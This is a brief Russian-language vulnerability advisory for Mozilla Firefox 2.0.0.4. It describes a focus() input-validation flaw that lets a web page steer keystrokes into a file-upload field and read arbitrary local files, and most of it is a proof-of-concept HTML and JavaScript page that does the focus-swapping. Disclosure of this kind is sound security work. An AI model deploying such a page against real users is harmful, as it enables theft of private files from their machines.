Программа: Mozilla Firefox 2.0.0.4
Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в функции focus(). Атакующий может без необходимости подтверждения перенаправить фокус с выделенных объектов на загрузку защищенного файла. Эксплуатирование уязвимости позволяет прочитать содержимое произвольных файлов на системе жертвы.
Пример:
<html>
<body>
<script>
function restore()
{
document.getElementById("text1").value=document.getElementById("file1").value;
document.getElementById("text1").focus();
}
function doKeyDown()
{
document.getElementById("label1").focus();
}
</script>
<input type="file" id="file1" name="file1" onkeydown="restore();" onkeyup="restore()" />
<label for="file1" id="label1" name="label1"></label>
<br>
<textarea name="text1" id="text1" onkeydown="doKeyDown()">
</textarea>
</body>
</html>
